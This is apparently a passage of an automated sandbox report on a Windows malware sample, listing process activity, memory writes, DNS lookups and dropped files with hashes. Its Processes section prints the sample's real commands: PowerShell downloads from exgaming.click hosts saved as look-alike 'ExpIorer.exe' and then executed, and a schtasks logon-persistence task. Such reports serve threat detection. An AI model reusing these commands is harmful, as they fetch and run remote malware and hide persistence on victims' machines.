N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4844 wrote to memory of 3848 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\System32\cmd.exe
PID 4844 wrote to memory of 3848 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\System32\cmd.exe
PID 3848 wrote to memory of 3756 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3848 wrote to memory of 3756 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3848 wrote to memory of 3732 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3848 wrote to memory of 3732 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3848 wrote to memory of 2884 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3848 wrote to memory of 2884 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4844 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\System32\cmd.exe
PID 4844 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\System32\cmd.exe
PID 4844 wrote to memory of 4276 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 4276 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\system32\cmd.exe
PID 5104 wrote to memory of 3508 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 5104 wrote to memory of 3508 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4276 wrote to memory of 3992 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 4276 wrote to memory of 3992 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3848 wrote to memory of 2244 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3848 wrote to memory of 2244 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4276 wrote to memory of 436 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\system.exe
PID 4276 wrote to memory of 436 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\system.exe
PID 436 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Roaming\system.exe C:\Windows\System32\cmd.exe
PID 436 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Roaming\system.exe C:\Windows\System32\cmd.exe
PID 2220 wrote to memory of 3564 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2220 wrote to memory of 3564 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2220 wrote to memory of 4360 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2220 wrote to memory of 4360 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2220 wrote to memory of 1440 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2220 wrote to memory of 1440 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2220 wrote to memory of 2420 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2220 wrote to memory of 2420 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe

"C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"' & exit

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp3DB0.tmp.bat""

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'

C:\Windows\system32\timeout.exe

timeout 3

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'

C:\Users\Admin\AppData\Roaming\system.exe

"C:\Users\Admin\AppData\Roaming\system.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 xcu.exgaming.click udp
US 8.8.8.8:53 xcu5.exgaming.click udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 xcu.exgaming.click udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 20.189.173.4:443 tcp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 31.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/4844-0-0x0000000000BD0000-0x0000000000BE8000-memory.dmp

memory/4844-1-0x00007FFE8F310000-0x00007FFE8FDD1000-memory.dmp

memory/4844-3-0x000000001BA80000-0x000000001BA90000-memory.dmp

memory/3756-13-0x0000029038580000-0x00000290385A2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2zj2lopo.khu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3756-14-0x00007FFE8F310000-0x00007FFE8FDD1000-memory.dmp

memory/3756-15-0x000002901FF20000-0x000002901FF30000-memory.dmp

memory/3756-16-0x000002901FF20000-0x000002901FF30000-memory.dmp

memory/3756-17-0x000002901FF20000-0x000002901FF30000-memory.dmp

memory/3756-20-0x00007FFE8F310000-0x00007FFE8FDD1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

memory/3732-22-0x00007FFE8F310000-0x00007FFE8FDD1000-memory.dmp

memory/3732-32-0x000001B0FFAD0000-0x000001B0FFAE0000-memory.dmp

memory/3732-33-0x000001B0FFAD0000-0x000001B0FFAE0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 aa8efa56e1e40374bbd21e0e469dceb7
SHA1 33a592799d4898c6efdd29e132f2f76ec51dbc08
SHA256 25eb4f899ae8f90b66b9342781456700d1af487f6f302fe5a727328b026f6bdf
SHA512 ad6de575b83db36b239317e4c46a1eaeb0383d5909a12b69ee2b38798c2b5cb0d19b464f5689037501d20592d92c4d3d84f0e49fdb1c0648b6593481a183f096

memory/3732-35-0x000001B0FFAD0000-0x000001B0FFAE0000-memory.dmp

memory/3732-36-0x000001B0FFAD0000-0x000001B0FFAE0000-memory.dmp

memory/3732-38-0x00007FFE8F310000-0x00007FFE8FDD1000-memory.dmp

memory/2884-39-0x00007FFE8F310000-0x00007FFE8FDD1000-memory.dmp

memory/2884-40-0x000001B8643C0000-0x000001B8643D0000-memory.dmp

memory/4844-41-0x00007FFE8F310000-0x00007FFE8FDD1000-memory.dmp

memory/2884-42-0x000001B8643C0000-0x000001B8643D0000-memory.dmp

memory/4844-43-0x000000001BA80000-0x000000001BA90000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b0cfdab278bf3db6d14817b1e701e4ee
SHA1 7ec7d56340dcaff7b6bf3d0e4b35be5bd57e87b8
SHA256 0554687e2254846915ac9d734989c77cfc0417bdd6607dd64dde2fb2dcc55854
SHA512 40a621b3ef79c9f74c937b4f04ef18bcc78bc7436c2035885bd8651b4ffc072152c6e87087be432c43860256c5e89ef33d57bb27822d36f18b8b9bda9208d4ca

memory/4844-58-0x00007FFEAD390000-0x00007FFEAD585000-memory.dmp

memory/4844-59-0x00007FFE8F310000-0x00007FFE8FDD1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp3DB0.tmp.bat

MD5 1f9b81a0d5f841ddcb6d6ba26296cae9
SHA1 9960c39484124a23ecb21e3e0e97e15cc23fa234
SHA256 d27c0b58577729e9f67c456542e97e574852dc8ad8378f291a71f445943f9b76
SHA512 f82189b1d33b475a37190a86326a627ee36db6205d6647c68e49e3a3d29e2747d48770fb2ef097887114002686da5cf1b628a98c1c65ceec20200adf30e7e348

memory/2884-61-0x000001B8643C0000-0x000001B8643D0000-memory.dmp

memory/2884-63-0x00007FFE8F310000-0x00007FFE8FDD1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 241e99fde6d6236ed49dff9334877997
SHA1 98d7945fe51411bd8c8dcf8edca7ec0197ab22f0
SHA256 ee3d1bd42ecdaa6b7a98bf2a24d93e5a8af73426ce952ca3306bdf55373a31f9
SHA512 0988c412228378ae8763f4554719c3f7ccf19d081c9e7733a5887dabe656f00ccb705d1396e4155909d7f961405b44fca008c8468de36db28199c30e49d52eb5

memory/2244-75-0x000002CA81610000-0x000002CA81620000-memory.dmp

memory/2244-74-0x000002CA81610000-0x000002CA81620000-memory.dmp

memory/2244-73-0x00007FFE8F310000-0x00007FFE8FDD1000-memory.dmp

memory/2244-77-0x000002CA81610000-0x000002CA81620000-memory.dmp

memory/2244-79-0x00007FFE8F310000-0x00007FFE8FDD1000-memory.dmp

C:\Users\Admin\AppData\Roaming\system.exe

MD5 a7d63348cfe9b0dc9d3aaec28c76c8f0
SHA1 1b993f554960286e90cfd7cedf4c457e1c46ff80
SHA256 16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54
SHA512 3910836ccae023d562c66bfd754b0d1e3aadc4c1cbf57e96e8220c1de6534a529ec3630d595a7baba7c56ca503b6ce6d012b9c388b9f896f2a0a8be317ca5010

memory/436-83-0x00007FFE8EFE0000-0x00007FFE8FAA1000-memory.dmp

C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf

MD5 cf759e4c5f14fe3eec41b87ed756cea8
SHA1 c27c796bb3c2fac929359563676f4ba1ffada1f5
SHA256 c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
SHA512 c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

memory/3564-95-0x00007FFE8EFE0000-0x00007FFE8FAA1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c3952ebc673efa6fd4e7ed0f8cfc8e9d
SHA1 e4b74b78e8ebdcfdc5fb62b5828554acfd2ef72f
SHA256 fb1870ff8cc1f2ca384d87ea7e86d26ed967b286a059844b0003f15ac9fd9c1e
SHA512 d641b37ff72442fe239d226aff2b34acd32c540d1ddd42ee513a3f915f3ae1edc9dab33a19736fcaa0830314264d1821b0a592d6a4076e3169b3d470e723f49e

memory/3564-97-0x000001D55E270000-0x000001D55E280000-memory.dmp

memory/3564-96-0x000001D55E270000-0x000001D55E280000-memory.dmp

memory/3564-99-0x00007FFE8EFE0000-0x00007FFE8FAA1000-memory.dmp

memory/4360-105-0x00007FFE8EFE0000-0x00007FFE8FAA1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 db6a77fc1a2afe95c10ac61dc57cfc81
SHA1 9f2dfbe5d95a5e67eae5dc6e01d622fc23f9c745
SHA256 43ed7034f0c166ae5b52e3b624c5bd79749df4f2d938847508da75c70daa1950
SHA512 30331b60a50d77cec9b027e386b05593f539e11978fc8ae62ac288794ff2194de423b93e7c439eb88b456142f04b125fe4a41e5569aa877445f3b23ff3c51cff

memory/4360-111-0x00000266FDAF0000-0x00000266FDB00000-memory.dmp

memory/4360-106-0x00000266FDAF0000-0x00000266FDB00000-memory.dmp

memory/4360-116-0x00007FFE8EFE0000-0x00007FFE8FAA1000-memory.dmp

memory/4360-114-0x00000266FDAF0000-0x00000266FDB00000-memory.dmp

memory/4360-113-0x00000266FDAF0000-0x00000266FDB00000-memory.dmp

memory/1440-123-0x0000022CCA8B0000-0x0000022CCA8C0000-memory.dmp

memory/1440-122-0x00007FFE8EFE0000-0x00007FFE8FAA1000-memory.dmp

memory/1440-128-0x0000022CCA8B0000-0x0000022CCA8C0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d4d9aa0d1f59c308165fcfde8af102ff
SHA1 06c80e42d7c81fe712fb01ee00cc4375bd56ef78
SHA256 ce8919c2f373fbeb62d6ecae9ab255bbeb265be6f3a8f58716dcafe04fda9ccb
SHA512 f0fd85d74956c0b91a1f45a1b66db51032ade95490692b281ca7a21ed44e44acda13eda3fa18288b2d8c7292d4678450754dc2a2177957fac534326953e64aa1

memory/436-129-0x00007FFE8EFE0000-0x00007FFE8FAA1000-memory.dmp

memory/1440-132-0x00007FFE8EFE0000-0x00007FFE8FAA1000-memory.dmp

memory/2420-133-0x00007FFE8EFE0000-0x00007FFE8FAA1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 fde6e408bc8837cf76db7bcb99e7d6a4
SHA1 23116a5ea5723f24d9c602ff2c5404b22f419213
SHA256 e16b6c2735cb26e19f9a20b78fd90c7030b9a6448614835966187c1156b37829
SHA512 c32781d435ff0384d9b110499a3a157fb0d3b1e7a351a4d8d72a73998c12e4e3d76d3dbbdb4ab3326a8ffe39c5bc2bcaa09bc4549351fc819b2109b7ca40c30e

memory/436-144-0x00007FFEAD390000-0x00007FFEAD585000-memory.dmp

memory/2420-146-0x00000213C62D0000-0x00000213C62E0000-memory.dmp

memory/2420-147-0x00007FFE8EFE0000-0x00007FFE8FAA1000-memory.dmp

memory/436-148-0x00007FFEAD390000-0x00007FFEAD585000-memory.dmp